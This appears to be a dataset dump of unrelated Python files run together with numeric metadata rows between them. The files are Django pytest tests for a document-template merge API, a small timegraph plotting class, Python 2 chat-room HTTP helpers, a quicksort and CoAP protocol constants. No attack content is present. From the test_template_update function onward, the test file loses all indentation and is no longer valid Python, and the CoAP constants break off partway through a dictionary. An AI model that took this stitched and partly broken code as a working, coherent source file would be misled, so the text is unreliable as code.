def test_template_list_group_access(
    db,
    admin_client,
    template,
    template_factory,
    snapshot,
    size,
    group_access_only,
    settings,
):
    settings.GROUP_ACCESS_ONLY = group_access_only
    url = reverse("template-list")

    # add a global template (no group)
    template_factory()

    response = admin_client.get(url)
    assert response.status_code == status.HTTP_200_OK
    assert response.json()["count"] == size


@pytest.mark.parametrize("template__description", ["test description"])
@pytest.mark.parametrize(
    "query_params,size",
    [
        ({"description__icontains": "test"}, 1),
        ({"description__search": "test"}, 1),
        ({"description__icontains": "unknown"}, 0),
        ({"description__search": "unknown"}, 0),
    ],
)
def test_template_list_query_params(
    db, admin_client, template, snapshot, size, query_params
):
    url = reverse("template-list")

    response = admin_client.get(url, data=query_params)
    assert response.status_code == status.HTTP_200_OK
    assert response.json()["count"] == size


def test_template_detail(db, client, template):
    url = reverse("template-detail", args=[template.pk])

    response = client.get(url)
    assert response.status_code == status.HTTP_200_OK

@pytest.mark.parametrize(
    "template_name,engine,status_code,group,require_authentication,authenticated",
    [
        (
            "docx-template.docx",
            models.Template.DOCX_TEMPLATE,
            status.HTTP_201_CREATED,
            None,
            False,
            False,
        ),
        (
            "docx-template.docx",
            models.Template.DOCX_TEMPLATE,
            status.HTTP_201_CREATED,
            None,
            True,
            True,
        ),
        (
            "docx-template.docx",
            models.Template.DOCX_TEMPLATE,
            status.HTTP_401_UNAUTHORIZED,
            None,
            True,
            False,
        ),
        (
            "docx-template.docx",
            models.Template.DOCX_TEMPLATE,
            status.HTTP_400_BAD_REQUEST,
            "unknown",
            True,
            True,
        ),
        (
            "docx-template.docx",
            models.Template.DOCX_TEMPLATE,
            status.HTTP_201_CREATED,
            "admin",
            True,
            True,
        ),
        (
            "docx-mailmerge.docx",
            models.Template.DOCX_MAILMERGE,
            status.HTTP_201_CREATED,
            "admin",
            True,
            True,
        ),
        (
            "docx-mailmerge-syntax.docx",
            models.Template.DOCX_MAILMERGE,
            status.HTTP_400_BAD_REQUEST,
            "admin",
            True,
            True,
        ),
        (
            "docx-template-syntax.docx",
            models.Template.DOCX_TEMPLATE,
            status.HTTP_400_BAD_REQUEST,
            "admin",
            True,
            True,
        ),
        (
            "test.txt",
            models.Template.DOCX_TEMPLATE,
            status.HTTP_400_BAD_REQUEST,
            None,
            False,
            False,
        ),
    ],
)
def test_template_create(
    db,
    client,
    admin_client,
    engine,
    template_name,
    status_code,
    group,
    require_authentication,
    settings,
    authenticated,
):
    if authenticated:
        client = admin_client
    settings.REQUIRE_AUTHENTICATION = require_authentication
    url = reverse("template-list")
    template_file = django_file(template_name)
    data = {"slug": "test-slug", "template": template_file.file, "engine": engine}
    if group:
        data["group"] = group
    response = client.post(url, data=data, format="multipart")
    assert response.status_code == status_code

    if status_code == status.HTTP_201_CREATED:
        data = response.json()
        template_link = data["template"]
        response = client.get(template_link)
        assert response.status_code == status.HTTP_200_OK
        Document(io.BytesIO(response.content))


@pytest.mark.parametrize(
    "status_code, disable_validation",
    [
        (
            status.HTTP_400_BAD_REQUEST,
            "false",
        ),
        (
            status.HTTP_400_BAD_REQUEST,
            "",
        ),
        (
            status.HTTP_201_CREATED,
            "true",
        ),
    ],
)
def test_disable_validation(
    db,
    status_code,
    admin_client,
    settings,
    disable_validation,
):
    settings.REQUIRE_AUTHENTICATION = False
    url = reverse("template-list")
    template_file = django_file("docx-template-syntax.docx")
    data = {
        "slug": "test-slug",
        "template": template_file.file,
        "engine": models.Template.DOCX_TEMPLATE,
    }
    if disable_validation:
        data["disable_template_validation"] = disable_validation
    response = admin_client.post(url, data=data, format="multipart")
    assert response.status_code == status_code

    if status_code == status.HTTP_201_CREATED:
        data = response.json()
        template_link = data["template"]
        response = admin_client.get(template_link)
        assert response.status_code == status.HTTP_200_OK
        Document(io.BytesIO(response.content))

@pytest.mark.parametrize(
    "template_name,available_placeholders,sample_data,files,expect_missing_placeholders,engine,status_code",
    [
        (
            "docx-template-placeholdercheck.docx",
            ["foo", "bar", "baz"],
            None,
            [],
            [
                "bar.some_attr",
                "black.png",
                "list",
                "list[]",
                "list[].attribute",
            ],
            models.Template.DOCX_TEMPLATE,
            status.HTTP_400_BAD_REQUEST,
        ),
        (
            "docx-template-placeholdercheck.docx",
            [
                "foo",
                "bar",
                "baz",
                "bar.some_attr",
                "list[].attribute",
                "black.png",
            ],
            None,
            [],
            [],
            models.Template.DOCX_TEMPLATE,
            status.HTTP_201_CREATED,
        ),
        (
            "docx-template-placeholdercheck.docx",
            [
                "foo",
                "bar",
                "baz",
                "bar.some_attr",
                "list[].attribute",
            ],
            None,
            [],
            ["black.png"],
            models.Template.DOCX_TEMPLATE,
            status.HTTP_400_BAD_REQUEST,
        ),
        (
            "docx-template-placeholdercheck.docx",
            None,
            {
                "foo": "hello",
                "bar": {
                    "some_attr": True,
                    "list": [{"attribute": "value"}, {"attribute": "value2"}],
                },
                "baz": "1234",
                "list": [{"attribute": "value"}],
            },
            [django_file("black.png").file],
            [],
            models.Template.DOCX_TEMPLATE,
            status.HTTP_201_CREATED,
        ),
        (
            "docx-template-placeholdercheck.docx",
            None,
            {},
            [django_file("black.png").file],
            [],
            models.Template.DOCX_TEMPLATE,
            status.HTTP_400_BAD_REQUEST,
        ),
        (
            "docx-template-placeholdercheck.docx",
            None,
            {},
            [],
            [],
            models.Template.DOCX_TEMPLATE,
            status.HTTP_201_CREATED,
        ),
        (
            "docx-template-placeholdercheck.docx",
            None,
            {
                "foo": "hello",
                "bar": {
                    "some_attr": True,
                    "list": [{"attribute": "value"}, {"attribute": "value2"}],
                },
                "baz": "1234",
                "list": [{"attribute": "value"}],
            },
            [],
            ["black.png"],
            models.Template.DOCX_TEMPLATE,
            status.HTTP_400_BAD_REQUEST,
        ),
        (
            "docx-template-placeholdercheck.docx",
            None,
            {
                "foo": "hello",
                "bar": {
                    "some_attr": True,
                    "list": [{"attribute": "value"}, {"attribute": "value2"}],
                },
            },
            [django_file("black.png").file],
            ["baz", "list", "list[]", "list[].attribute"],
            models.Template.DOCX_TEMPLATE,
            status.HTTP_400_BAD_REQUEST,
        ),
        (
            "docx-mailmerge.docx",
            None,
            {
                "foo": "hello",
                "bar": {
                    "some_attr": True,
                    "list": [{"attribute": "value"}, {"attribute": "value2"}],
                },
            },
            [],
            ["test"],
            models.Template.DOCX_MAILMERGE,
            status.HTTP_400_BAD_REQUEST,
        ),
        (
            "docx-mailmerge.docx",
            None,
            {
                "foo": "hello",
                "bar": {
                    "some_attr": True,
                    "list": [{"attribute": "value"}, {"attribute": "value2"}],
                },
            },
            [],
            ["test"],
            models.Template.DOCX_MAILMERGE,
            status.HTTP_400_BAD_REQUEST,
        ),
        (
            "docx-mailmerge.docx",
            None,
            {"test": "hello"},
            [],
            [],
            models.Template.DOCX_MAILMERGE,
            status.HTTP_201_CREATED,
        ),
        (
            "docx-mailmerge.docx",
            ["test", "blah"],
            {"test": "hello"},
            [],
            [],
            models.Template.DOCX_MAILMERGE,
            status.HTTP_400_BAD_REQUEST,
        ),
        (
            "docx-mailmerge.docx",
            [],
            {"test": "hello"},
            [django_file("black.png").file],
            [],
            models.Template.DOCX_MAILMERGE,
            status.HTTP_400_BAD_REQUEST,
        ),
    ],
)
def test_template_create_with_available_placeholders(
    db,
    admin_client,
    engine,
    template_name,
    available_placeholders,
    sample_data,
    files,
    status_code,
    settings,
    expect_missing_placeholders,
):
    settings.DOCXTEMPLATE_JINJA_EXTENSIONS = ["jinja2.ext.loopcontrols"]
    url = reverse("template-list")
    template_file = django_file(template_name)
    data = {
        "slug": "test-slug",
        "template": template_file.file,
        "files": files,
        "engine": engine,
    }
    if sample_data:
        data["sample_data"] = json.dumps(sample_data)
    if available_placeholders:
        data["available_placeholders"] = available_placeholders
    response = admin_client.post(url, data=data, format="multipart")
    assert response.status_code == status_code, response.json()

    if status_code == status.HTTP_400_BAD_REQUEST:
        resp = response.json()
        expect_missing_str = "; ".join(expect_missing_placeholders)
        if sample_data and available_placeholders:
            # validation only allows one of these two params
            assert (
                resp["non_field_errors"][0]
                == "Only one of available_placeholders and sample_data is allowed"
            )
        elif engine == models.Template.DOCX_MAILMERGE and files:
            assert (
                resp["non_field_errors"][0]
                == 'Files are only accepted with the "docx-template" engine'
            )
        elif not sample_data and files:
            assert (
                resp["non_field_errors"][0]
                == "Files are only accepted when also providing sample_data"
            )
        else:
            # we expect some missing placeholders
            assert (
                resp["non_field_errors"][0]
                == f"Template uses unavailable placeholders: {expect_missing_str}"
            )

    if status_code == status.HTTP_201_CREATED:
        data = response.json()
        template_link = data["template"]
        response = admin_client.get(template_link)
        assert response.status_code == status.HTTP_200_OK
        Document(io.BytesIO(response.content))
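
# For manual poking, the endpoints exercised in these tests map onto plain
# HTTP calls (a sketch; host, port and the /api/v1 prefix are assumptions
# about a local dev setup, not taken from this file):
#
#   curl -X POST http://localhost:8000/api/v1/template/test-slug/merge/ \
#        -H "Content-Type: application/json" \
#        -d '{"data": {"test": "Test input"}}' -o merged.docx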
@pytest.mark.parametrize(
"template_name,status_code",
[
("docx-template.docx", status.HTTP_200_OK),
("test.txt", status.HTTP_400_BAD_REQUEST),
],
)
def test_template_update(db, client, template, template_name, status_code):
url = reverse("template-detail", args=[template.pk])
template_file = django_file(template_name)
data = {"description": "Test description", "template": template_file.file}
response = client.patch(url, data=data, format="multipart")
assert response.status_code == status_code
if status_code == status.HTTP_200_OK:
template.refresh_from_db()
assert template.description == "Test description"
def test_template_destroy(db, client, template):
url = reverse("template-detail", args=[template.pk])
response = client.delete(url)
assert response.status_code == status.HTTP_204_NO_CONTENT
@pytest.mark.parametrize(
"template__slug,template__engine,template__template",
[
(
"TestNameTemplate",
models.Template.DOCX_TEMPLATE,
django_file("docx-template.docx"),
),
(
"TestNameMailMerge",
models.Template.DOCX_MAILMERGE,
django_file("docx-mailmerge.docx"),
),
],
)
def test_template_merge_docx(db, client, template, snapshot):
url = reverse("template-merge", args=[template.pk])
response = client.post(url, data={"data": {"test": "Test input"}}, format="json")
assert response.status_code == status.HTTP_200_OK
assert (
        response["Content-Type"]
== "application/vnd.openxmlformats-officedocument.wordprocessingml.document"
)
docx = Document(io.BytesIO(response.content))
xml = etree.tostring(docx._element.body, encoding="unicode", pretty_print=True)
try:
snapshot.assert_match(xml)
except AssertionError: # pragma: no cover
with open(f"/tmp/{template.slug}.docx", "wb") as output:
output.write(response.content)
print("Template output changed. Check file at %s" % output.name)
raise
@pytest.mark.parametrize(
"placeholder,template_content",
[
("{{blah}}", {"blah": "blub"}),
(
'{{NAME and ", represents " + NAME}}',
{"NAME": "foo"},
),
(
'{{NAME and ", represents " + NAME}}',
{"NAME": ""},
),
],
)
def test_merge_expression(
docx_template_with_placeholder, client, snapshot, placeholder, template_content
):
"""Test evaluation of some custom expressions.
Use this test to try out expressions without creating a new docx template for each
variant.
"""
template = docx_template_with_placeholder(placeholder)
url = reverse("template-merge", args=[template.pk])
response = client.post(url, data={"data": template_content}, format="json")
assert response.status_code == status.HTTP_200_OK
docx = Document(io.BytesIO(response.content))
xml = etree.tostring(docx._element.body, encoding="unicode", pretty_print=True)
try:
snapshot.assert_match(xml)
except AssertionError: # pragma: no cover
with open(f"/tmp/{template.slug}.docx", "wb") as output:
output.write(response.content)
print("Template output changed. Check file at %s" % output.name)
raise
@pytest.mark.parametrize(
"placeholder,template_content",
[
("{{blah}}", {"blah": "blub"}),
(
'{{NAME and ", represents " + NAME}}',
{"NAME": "foo"},
),
(
'{{NAME and ", represents " + NAME}}',
{"NAME": ""},
),
],
)
def test_validate_expression(
docx_template_with_placeholder, client, placeholder, template_content
):
"""Test validation of templates with custom expressions."""
template = docx_template_with_placeholder(placeholder)
serializer = serializers.TemplateSerializer()
serializer.instance = template
serializer.validate({"data": template_content})
# This needs a somewhat odd parametrization. If `unoconv_local` sits in a
# separate `parametrize()`, the template filename in the second test run gets
# a hash suffix appended (Django's file storage de-duplicates names) and the
# test fails
@pytest.mark.parametrize(
"template__engine,template__template,unoconv_local",
[
(models.Template.DOCX_TEMPLATE, django_file("docx-template.docx"), True),
(models.Template.DOCX_TEMPLATE, django_file("docx-template.docx"), False),
],
)
def test_template_merge_as_pdf(db, settings, unoconv_local, client, template):
url = reverse("template-merge", args=[template.pk])
response = client.post(
url, data={"data": {"test": "Test input"}, "convert": "pdf"}, format="json"
)
assert response.status_code == status.HTTP_200_OK
assert response["Content-Type"] == "application/pdf"
assert f"{template.pk}.pdf" in response["Content-Disposition"]
assert response.content[0:4] == b"%PDF"
@pytest.mark.parametrize(
"template__engine,template__template",
[(models.Template.DOCX_TEMPLATE, django_file("docx-template-loopcontrols.docx"))],
)
def test_template_merge_jinja_extensions_docx(db, client, template, settings, snapshot):
settings.DOCXTEMPLATE_JINJA_EXTENSIONS = ["jinja2.ext.loopcontrols"]
url = reverse("template-merge", args=[template.pk])
response = client.post(url, data={"data": {"test": "Test input"}}, format="json")
assert response.status_code == status.HTTP_200_OK
assert (
        response["Content-Type"]
== "application/vnd.openxmlformats-officedocument.wordprocessingml.document"
)
docx = Document(io.BytesIO(response.content))
xml = etree.tostring(docx._element.body, encoding="unicode", pretty_print=True)
snapshot.assert_match(xml)
@pytest.mark.parametrize(
"missing_file,wrong_mime,status_code",
[
(False, False, status.HTTP_200_OK),
(False, True, status.HTTP_400_BAD_REQUEST),
(True, False, status.HTTP_400_BAD_REQUEST),
],
)
@pytest.mark.parametrize(
"template__engine",
[models.Template.DOCX_TEMPLATE],
)
def test_template_merge_jinja_filters_docx(
db,
client,
template,
snapshot,
settings,
tmp_path,
missing_file,
wrong_mime,
status_code,
):
settings.LANGUAGE_CODE = "de-ch"
url = reverse("template-merge", args=[template.pk])
    # Couldn't put this into `parametrize`: on the second run, Django's file
    # storage appends a random-looking suffix to the template name to avoid a
    # filename collision.
template.template = django_file("docx-template-filters.docx")
template.save()
data = {
"data": json.dumps(
{
"test_date": "1984-09-15",
"test_time": "23:24",
"test_datetime": "1984-09-15 23:23",
"test_datetime2": "23:23-1984-09-15",
"test_none": None,
"test_nested": {"multiline": "This is\na test."},
}
),
}
    if not missing_file:
        file = django_file("black.png").file
        if wrong_mime:
            # create a file with the correct filename (black.png) but with
            # the contents of a docx, so the mime-type check has to fail
            file = tmp_path / "black.png"
            file.write_bytes(template.template.file.read())
            file = file.open("rb")
        data["files"] = [file]
response = client.post(url, data=data, format="multipart")
assert response.status_code == status_code
if status_code == status.HTTP_200_OK:
assert (
            response["Content-Type"]
== "application/vnd.openxmlformats-officedocument.wordprocessingml.document"
)
docx = Document(io.BytesIO(response.content))
xml = etree.tostring(docx._element.body, encoding="unicode", pretty_print=True)
snapshot.assert_match(xml)
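# Sketch of the kind of Jinja filter `docx-template-filters.docx` relies on
# for the date values above (hypothetical: the service registers its own
# implementations, and the Swiss-German output format is an assumption based
# on LANGUAGE_CODE = "de-ch"):
def _format_date(value, fmt="%d.%m.%Y"):
    from datetime import datetime
    return datetime.strptime(value, "%Y-%m-%d").strftime(fmt) if value else ""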
@pytest.mark.parametrize(
"template__engine",
[models.Template.DOCX_TEMPLATE],
)
@pytest.mark.parametrize(
"file_value",
[None, ""],
)
def test_template_merge_file_reset(
db,
client,
template,
settings,
file_value,
):
settings.LANGUAGE_CODE = "de-ch"
url = reverse("template-merge", args=[template.pk])
    # Couldn't put this into `parametrize`: on the second run, Django's file
    # storage appends a random-looking suffix to the template name to avoid a
    # filename collision.
template.template = django_file("docx-template-filters.docx")
template.save()
data = {
"data": {
"test_date": "1984-09-15",
"test_time": "23:24",
"test_datetime": "1984-09-15 23:23",
"test_datetime2": "23:23-1984-09-15",
"test_none": None,
"test_nested": {"multiline": "This is\na test."},
"black.png": file_value,
}
}
response = client.post(url, data=data, format="json")
assert response.status_code == status.HTTP_200_OK
assert (
        response["Content-Type"]
== "application/vnd.openxmlformats-officedocument.wordprocessingml.document"
)
@pytest.mark.parametrize(
"sample,expected",
[
({"foo": {"bar": ["foo", "blah"]}}, ["foo", "foo.bar", "foo.bar[]"]),
(
{
"this": {
"is": {
"a": [
{
"list": {
"with": {
"a": ["nested", "object", "and", "a", "list"]
}
}
}
]
}
}
},
[
"this",
"this.is",
"this.is.a",
"this.is.a[]",
"this.is.a[].list",
"this.is.a[].list.with",
"this.is.a[].list.with.a",
"this.is.a[].list.with.a[]",
],
),
],
)
def test_sample_to_placeholders(sample, expected):
ts = serializers.TemplateSerializer()
assert ts._sample_to_placeholders(sample) == sorted(expected)
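# A reference implementation of the flattening behaviour exercised above
# could look like this (hypothetical sketch, not the serializer's code):
def _flatten_sample(sample, prefix=""):
    paths = set()
    for key, value in sample.items():
        path = f"{prefix}{key}"
        paths.add(path)
        if isinstance(value, dict):
            paths |= _flatten_sample(value, prefix=f"{path}.")
        elif isinstance(value, list):
            paths.add(f"{path}[]")
            for item in value:
                if isinstance(item, dict):
                    paths |= _flatten_sample(item, prefix=f"{path}[].")
    return paths
# sorted(_flatten_sample({"foo": {"bar": ["foo", "blah"]}})) yields
# ["foo", "foo.bar", "foo.bar[]"], matching the first case above.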
@pytest.mark.parametrize(
"template__engine,template__template",
[
(
models.Template.DOCX_TEMPLATE,
django_file("docx-template-placeholdercheck.docx"),
)
],
)
def test_template_merge_missing_data(db, client, template, settings):
settings.DOCXTEMPLATE_JINJA_EXTENSIONS = ["jinja2.ext.loopcontrols"]
url = reverse("template-merge", args=[template.pk])
response = client.post(url, data={"data": {"blah": "Test input"}}, format="json")
assert response.status_code == status.HTTP_400_BAD_REQUEST
assert response.json() == [
"Placeholder from template not found in data: 'bar' is undefined"
]
| 29.216316 | 108 | 0.552505 | 2,303 | 23,636 | 5.464177 | 0.118107 | 0.051494 | 0.045772 | 0.047521 | 0.695327 | 0.651621 | 0.618802 | 0.58924 | 0.570407 | 0.52829 | 0 | 0.015918 | 0.32222 | 23,636 | 808 | 109 | 29.252475 | 0.769601 | 0.037147 | 0 | 0.606488 | 0 | 0 | 0.198055 | 0.069583 | 0 | 0 | 0 | 0 | 0.056417 | 1 | 0.023977 | false | 0 | 0.012694 | 0 | 0.036671 | 0.008463 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d115700aac242d3b1b099963203e91cfd2713a5f | 953 | py | Python | timegraph/drawing/drawing.py | jfm/TimeGraph | f5da84f076fbe34f5a8d615a17b26b270b16e662 | [
"MIT"
] | null | null | null | timegraph/drawing/drawing.py | jfm/TimeGraph | f5da84f076fbe34f5a8d615a17b26b270b16e662 | [
"MIT"
] | null | null | null | timegraph/drawing/drawing.py | jfm/TimeGraph | f5da84f076fbe34f5a8d615a17b26b270b16e662 | [
"MIT"
] | null | null | null |
from numbers import Number
from timegraph.drawing.plotter import Plotter
class Drawing:
def __init__(self):
self.plotter = Plotter()
def create_graph(self, title, db_response):
value_list = self.get_value_list(db_response.get_points())
self.plotter.plot_timeseries(value_list)
    def get_value_list(self, points):
        # Collect every numeric, non-'time' field value across all points.
        result = []
for point in points:
point_keys = point.keys()
for key in point_keys:
if key != 'time':
if (point[key] is not None and
isinstance(point[key], Number)):
result.append(point[key])
return result
def print_graph(self, lines):
for line in lines:
print(line)
class DrawingException(Exception):
def __init__(self, code, message):
super().__init__(code, message)
self.code = code
self.message = message
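# Hedged usage sketch (not part of the original module): Drawing expects a
# response object exposing get_points() that returns dicts, mimicked below.
class _FakeResponse:
    def __init__(self, points):
        self._points = points
    def get_points(self):
        return self._points
# Drawing().get_value_list(_FakeResponse([{"time": "t0", "cpu": 0.5},
#                                         {"time": "t1", "cpu": None}]))
# returns [0.5]: the 'time' key and the non-numeric None are filtered out.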
| 25.078947 | 66 | 0.58447 | 110 | 953 | 4.827273 | 0.409091 | 0.067797 | 0.041431 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.327387 | 953 | 37 | 67 | 25.756757 | 0.828393 | 0 | 0 | 0 | 0 | 0 | 0.004197 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.192308 | false | 0 | 0.076923 | 0 | 0.384615 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d11872aebf89c5087977d0c53424643d2ec74406 | 635 | py | Python | misc/xmpp.py | ChanJLee/YLive_Server | a8cab5da54ed017aa8e86f31be1cb768e887df8e | [
"Apache-2.0"
] | null | null | null | misc/xmpp.py | ChanJLee/YLive_Server | a8cab5da54ed017aa8e86f31be1cb768e887df8e | [
"Apache-2.0"
] | null | null | null | misc/xmpp.py | ChanJLee/YLive_Server | a8cab5da54ed017aa8e86f31be1cb768e887df8e | [
"Apache-2.0"
] | null | null | null |
# coding=utf-8
import httplib
import urllib
def cal_room_name(user):
return "room_%d" % user.id
def create_chat_room(user):
    # URL-encode the query so usernames with spaces or symbols stay valid
    params = urllib.urlencode({"room_name": cal_room_name(user),
                               "room_title": user.username})
    connection = httplib.HTTPConnection("localhost", 8081)
    connection.request("POST", "/chat_room/?" + params, None)
    response = connection.getresponse()
    return response.read()
def query_chat_room(user):
    params = urllib.urlencode({"room_name": cal_room_name(user)})
    connection = httplib.HTTPConnection("localhost", 8081)
    connection.request("GET", "/chat_room/?" + params, None)
    response = connection.getresponse()
    return response.read()
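# Hedged usage sketch (not part of the original module): any object with an
# integer `id` and a `username` attribute satisfies the helpers above.
class _FakeUser(object):
    id = 42
    username = "alice"
# create_chat_room(_FakeUser()) would POST something like
# /chat_room/?room_name=room_42&room_title=alice to localhost:8081.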
| 27.608696 | 91 | 0.699213 | 82 | 635 | 5.219512 | 0.378049 | 0.093458 | 0.077103 | 0.10514 | 0.759346 | 0.686916 | 0.686916 | 0.401869 | 0.149533 | 0 | 0 | 0.016791 | 0.155906 | 635 | 22 | 92 | 28.863636 | 0.781716 | 0.018898 | 0 | 0.4 | 0 | 0 | 0.151369 | 0.099839 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.066667 | 0.066667 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d11a0f14b13e08c2ea2ffb4f9fe578313734bce9 | 591 | py | Python | PROB10/my_sort/quickSort.py | JoshOY/DataStructureCourseDesign | 74085237fe4ab997c5cb86c56c26f552ce9d1f01 | [
"MIT"
] | null | null | null | PROB10/my_sort/quickSort.py | JoshOY/DataStructureCourseDesign | 74085237fe4ab997c5cb86c56c26f552ce9d1f01 | [
"MIT"
] | null | null | null | PROB10/my_sort/quickSort.py | JoshOY/DataStructureCourseDesign | 74085237fe4ab997c5cb86c56c26f552ce9d1f01 | [
"MIT"
] | null | null | null |
import copy
qsort_step = 0
def quick_sort(sorting_list):
    """Recursive quicksort; bumps the global qsort_step once per pivot chosen."""
    global qsort_step
    ls = copy.deepcopy(sorting_list)  # work on a copy so the input stays intact
    if len(sorting_list) == 0:
        return []
    elif len(sorting_list) == 1:
        return sorting_list
    else:
        pivot = ls[0]
        qsort_step += 1
        # partition around the pivot, then sort each side recursively
        left = quick_sort([x for x in ls[1:] if x < pivot])
        right = quick_sort([x for x in ls[1:] if x >= pivot])
        return left + [pivot] + right
if __name__ == "__main__":
sList = [13, 14, 94, 33, 82, 25, 59, 94, 65, 23, 45, 27, 73, 25, 39, 10]
    print([quick_sort(sList), qsort_step])
| 28.142857 | 76 | 0.580372 | 93 | 591 | 3.462366 | 0.462366 | 0.170807 | 0.086957 | 0.080745 | 0.167702 | 0.167702 | 0.167702 | 0.167702 | 0.167702 | 0.167702 | 0 | 0.092417 | 0.285956 | 591 | 21 | 77 | 28.142857 | 0.670616 | 0 | 0 | 0 | 0 | 0 | 0.013514 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.055556 | 0 | 0.277778 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0
d11b5dcf6ed13b57fcbad01aaad4e40798e3657d | 5,534 | py | Python | eds/openmtc-gevent/common/openmtc/lib/coap/coapy/coapy/constants.py | piyush82/elastest-device-emulator-service | b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7 | [
"Apache-2.0"
] | null | null | null | eds/openmtc-gevent/common/openmtc/lib/coap/coapy/coapy/constants.py | piyush82/elastest-device-emulator-service | b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7 | [
"Apache-2.0"
] | null | null | null | eds/openmtc-gevent/common/openmtc/lib/coap/coapy/coapy/constants.py | piyush82/elastest-device-emulator-service | b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7 | [
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2010 People Power Co.
# All rights reserved.
#
# This open source code was developed with funding from People Power Company
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the
# distribution.
# - Neither the name of the People Power Corporation nor the names of
# its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# PEOPLE POWER CO. OR ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE
#
COAP_PORT = 5683  # earlier CoAP drafts used port 61616
"""The (TBR) IANA-assigned standard port for COAP services."""
RESPONSE_TIMEOUT = 1
"""The time, in seconds, to wait for an acknowledgement of a
confirmable message.
The inter-transmission time doubles for each retransmission."""
MAX_RETRANSMIT = 15
"""The number of retransmissions of confirmable messages to
non-multicast endpoints before the infrastructure assumes no
acknowledgement will be received."""
"""OLD CODES
codes = { 1: 'GET',
2: 'POST',
3: 'PUT',
4: 'DELETE',
40: '100 Continue',
80: '200 OK',
81: '201 Created',
124: '304 Not Modified',
160: '400 Bad Request',
164: '404 Not Found',
165: '405 Method Not Allowed',
175: '415 Unsupported Media Type',
200: '500 Internal Server Error',
202: '502 Bad Gateway',
204: '504 Gateway Timeout' }
GET = 1
POST = 2
PUT = 3
DELETE = 4
CONTINUE = 40
OK = 80
CREATED = 81
NOT_MODIFIED = 124
BAD_REQUEST = 160
NOT_FOUND = 164
METHOD_NOT_ALLOWED = 165
UNSUPPORTED_MEDIA_TYPE = 175
INTERNAL_SERVER_ERROR = 200
BAD_GATEWAY = 202
GATEWAY_TIMEOUT = 204
"""
codes = { 1: '0.01 GET',
2: '0.02 POST',
3: '0.03 PUT',
4: '0.04 DELETE',
65: '2.01 Created',
66: '2.02 Deleted',
67: '2.03 Valid',
68: '2.04 Changed',
69: '2.05 Content',
95: '2.31 Continue',
128: '4.00 Bad Request',
131: '4.03 Forbidden',
132: '4.04 Not Found',
133: '4.05 Method Not Allowed',
143: '4.15 Unsupported Content Format',
160: '5.00 Internal Server Error',
162: '5.02 Bad Gateway',
164: '5.04 Gateway Timeout' }
GET = 1
POST = 2
PUT = 3
DELETE = 4
CREATED = 65
DELETED = 66
VALID = 67
CHANGED = 68
CONTENT = 69
CONTINUE = 95
BAD_REQUEST = 128
FORBIDDEN = 131
NOT_FOUND = 132
METHOD_NOT_ALLOWED = 133
UNSUPPORTED_CONTENT_FORMAT = 143
INTERNAL_SERVER_ERROR = 160
BAD_GATEWAY = 162
GATEWAY_TIMEOUT = 164
http2coap_codes = {200: CONTENT,
201: CREATED,
202: CREATED,
204: CHANGED,
304: VALID,
400: BAD_REQUEST,
403: FORBIDDEN,
404: NOT_FOUND,
405: METHOD_NOT_ALLOWED,
409: METHOD_NOT_ALLOWED,
415: UNSUPPORTED_CONTENT_FORMAT,
500: INTERNAL_SERVER_ERROR,
502: BAD_GATEWAY,
504: GATEWAY_TIMEOUT}
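# Hedged helper sketch (not part of the original module): map a proxied HTTP
# status onto a CoAP response code, falling back to 5.00 Internal Server
# Error for anything unlisted.
def http_status_to_coap(status):
    return http2coap_codes.get(status, INTERNAL_SERVER_ERROR)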
media_types = { 0: 'text/plain',
